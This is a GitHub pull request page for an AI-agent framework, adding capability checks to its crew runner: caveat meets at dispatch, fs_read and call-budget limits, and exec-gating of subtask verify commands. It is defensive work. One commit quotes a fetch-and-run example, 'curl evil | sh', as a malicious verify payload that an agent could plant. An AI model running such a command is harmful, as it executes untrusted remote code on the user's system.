feat(ocap): crew_runner applies caveats.meet() at dispatch + honest docstrings (#750) by hartsock · Pull Request #751 · Gilamonster-Foundation/newt-agent

hartsock · 2026-06-29T15:18:03Z

OCAP enforcement-floor stack — PR 2 of 8 · epic #749

Review/merge order (full ordered list and rationale in #749): the docs PR (docs/ocap-authority-review, containing the design review and paper; it opens at the end of the stack) is the "read-first" rationale. This PR is step 2; step 3 (crew fs_read) branches off it. Merge bottom-up.

What this does

Wires the .meet() attenuation seam: LocalCrewRunner::dispatch now passes child = session.meet(crew_clamp) (pure dispatch_caveats helper) to run_team/run_crew instead of the session caveats unmodified. crew_clamp is config-sourced ([crew], default Caveats::top() ⇒ meet is identity ⇒ today's behavior unchanged) and is the tightening point for the per-subtask team_clamp (#749 step 8). The crew_tool.rs docstrings now claim only what meet guarantees (≤ session), replacing the false "never the session's full grant."
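The attenuation described above can be illustrated with a minimal, self-contained sketch. It is not the newt-agent implementation: the two-axis Caveats struct, the Scope enum, and their fields are hypothetical stand-ins. Only the names meet, top, crew_clamp, and dispatch_caveats come from this PR. The point is that the child caveats are the greatest lower bound of the session and the clamp, so a top clamp changes nothing and any tighter clamp can only narrow.

```rust
use std::collections::BTreeSet;

/// Hypothetical scope axis: everything, or an explicit allow-list.
#[derive(Clone, Debug, PartialEq, Eq)]
enum Scope {
    All,
    Only(BTreeSet<String>),
}

impl Scope {
    /// Greatest lower bound: permits only what both sides permit.
    fn meet(&self, other: &Scope) -> Scope {
        match (self, other) {
            // `All` is the identity element for meet.
            (Scope::All, s) | (s, Scope::All) => s.clone(),
            (Scope::Only(a), Scope::Only(b)) => {
                Scope::Only(a.intersection(b).cloned().collect())
            }
        }
    }

    fn permits(&self, item: &str) -> bool {
        match self {
            Scope::All => true,
            Scope::Only(set) => set.contains(item),
        }
    }
}

/// Hypothetical two-axis caveat set (the real type has more axes).
#[derive(Clone, Debug, PartialEq, Eq)]
struct Caveats {
    net: bool,
    fs_read: Scope,
}

impl Caveats {
    /// The most permissive element: meeting with it is the identity.
    fn top() -> Caveats {
        Caveats { net: true, fs_read: Scope::All }
    }

    /// Axis-wise meet: the result is <= both inputs on every axis.
    fn meet(&self, other: &Caveats) -> Caveats {
        Caveats {
            net: self.net && other.net,
            fs_read: self.fs_read.meet(&other.fs_read),
        }
    }
}

/// Pure helper in the spirit of the PR's dispatch_caveats:
/// the child gets session ∧ clamp, never the session unmodified.
fn dispatch_caveats(session: &Caveats, crew_clamp: &Caveats) -> Caveats {
    session.meet(crew_clamp)
}
```

Keeping the helper pure (no I/O, no config lookup) is what makes the "≤ session" property directly testable: a net-denying clamp must yield a child that denies net, and the default top clamp must return the session unchanged.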

Test plan

dispatch_caveats_meets_the_clamp_and_stays_le_session: red on today's code (a crew with a net-denying clamp still permitted net), green after. Also covered: the default-is-top identity case and the config wiring. just check is green (2663 tests). The agent-mesh meet algebra is sound and unchanged.

Fixes #750. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…ocstrings (#750)

OCAP enforcement-floor stack (#749, PR 2/8).

Wires the .meet() attenuation seam: LocalCrewRunner::dispatch now computes child_caveats = session.meet(crew_clamp) via a pure dispatch_caveats helper and passes it to run_team/run_crew, instead of the session caveats unmodified. crew_clamp is config-sourced ([crew] CrewPolicyConfig, default Caveats::top(), so meet is identity by default and today's behavior is unchanged) and is the tightening point for the per-subtask team_clamp (#749 step 8). The crew_tool.rs docstrings now claim only what meet guarantees (<= session), replacing the false "never the session's full grant."

TDD: dispatch_caveats_meets_the_clamp_and_stays_le_session (red on today's code: a crew with a net-denying clamp still permitted net; green after) + default-is-top identity + the config wiring. just check green (2663 tests). The agent-mesh meet algebra is sound + unchanged.

Fixes #750. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

…lls, team-verify, clamp grammar (#749) (#781)

* feat(ocap): crew.rs enforces fs_read - complete mediation for reads (#752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751).

The crew CURATE stage read navigator-selected files unconditionally: a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash, with fs_read=Only([file]); the out-of-scope file is not read, the in-scope one is (red on today's code: both read; green after). just check green (52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): crew enforces max_calls - complete mediation for the call budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759).

The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch, matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged.
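The call-budget gate described above might look roughly like the following sketch. It assumes a simplified loop in which every attempt dispatches three roles in order. Only CountBound, Unlimited, AtMost, permits_one_more, calls_used, max_attempts, and NeedsHumanReview are names from the commit message; run_crew_sketch and the AttemptsExhausted variant are hypothetical, and the real crew loop does considerably more.

```rust
/// Budget on the number of model dispatches.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
enum CountBound {
    Unlimited,
    AtMost(u32),
}

impl CountBound {
    /// True if one more call is allowed after `used` calls were made.
    fn permits_one_more(&self, used: u32) -> bool {
        match self {
            CountBound::Unlimited => true,
            CountBound::AtMost(n) => used < *n,
        }
    }
}

#[derive(Debug, PartialEq, Eq)]
enum Outcome {
    /// Budget denied a dispatch: stop honestly, never report success.
    NeedsHumanReview,
    /// Hypothetical variant: the attempt ceiling was reached first.
    AttemptsExhausted,
}

/// Simplified loop: max_calls and max_attempts are independent ceilings.
/// Returns the outcome and the number of dispatches actually made.
fn run_crew_sketch(max_calls: CountBound, max_attempts: u32) -> (Outcome, u32) {
    let mut calls_used = 0u32;
    for _attempt in 0..max_attempts {
        for _role in ["navigate", "plan", "triage"].iter() {
            // Gate BEFORE each dispatch, so a zero budget denies even
            // the very first (navigator) call.
            if !max_calls.permits_one_more(calls_used) {
                return (Outcome::NeedsHumanReview, calls_used);
            }
            calls_used += 1; // stand-in for the real model dispatch
        }
    }
    (Outcome::AttemptsExhausted, calls_used)
}
```

Under these assumptions, AtMost(3) stops after exactly three dispatches regardless of max_attempts, AtMost(0) makes none, and Unlimited leaves the attempt ceiling as the only bound.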
net: documented in-code. The crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code: 21 dispatches with max_calls=AtMost(3); green after: 3) + max_calls_zero_denies_even_the_navigator (red: 11; green: 0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760).

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check: a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed, with exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code: both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

* feat(ocap): NamedPermissionPreset can clamp fs_read - clamp-grammar fix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765).

The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can.
NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp; follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default, because flipping it would break back-compat for every preset consumer).

TDD: fs_read_clamp_narrows_reads (red on today: fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com>
Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
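The back-compatible lowering of an optional fs_read clamp (from the NamedPermissionPreset change above) can be sketched as follows. This is an illustration under stated assumptions, not the project's code: the struct shapes and the name field are hypothetical, ScopeSpec is reduced to two variants, and serde is left out so the block stays dependency-free (in the real config, the commit message says the None default comes from serde).

```rust
/// Reduced stand-in for the scope grammar; the default is All.
#[derive(Clone, Debug, PartialEq, Eq)]
enum ScopeSpec {
    All,
    Only(Vec<String>),
}

impl Default for ScopeSpec {
    fn default() -> Self {
        ScopeSpec::All
    }
}

/// Hypothetical shape: only the optional fs_read clamp is modeled.
#[derive(Clone, Debug, Default)]
struct NamedPermissionPreset {
    name: String,
    /// None means "not specified", which lowers to All.
    fs_read: Option<ScopeSpec>,
}

#[derive(Clone, Debug, PartialEq, Eq)]
struct CaveatProfile {
    fs_read: ScopeSpec,
}

impl NamedPermissionPreset {
    /// Lower the preset: Some(spec) narrows reads, None keeps All,
    /// so presets written before the field existed behave as before.
    fn to_caveat_profile(&self) -> CaveatProfile {
        CaveatProfile {
            fs_read: self.fs_read.clone().unwrap_or_default(),
        }
    }
}
```

Making the field an Option rather than a bare ScopeSpec keeps "unspecified" distinguishable from an explicit All, and literals that use ..Default::default() need no change when the field is added.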

hartsock added the ocap label (Object-capability / authority-security; pending full design review) Jun 29, 2026

hartsock merged commit 6ead94d into main Jun 29, 2026
16 checks passed

hartsock deleted the feat/ocap-2-crew-meet-seam branch June 29, 2026 23:06

hartsock merged 1 commit into main from feat/ocap-2-crew-meet-seam
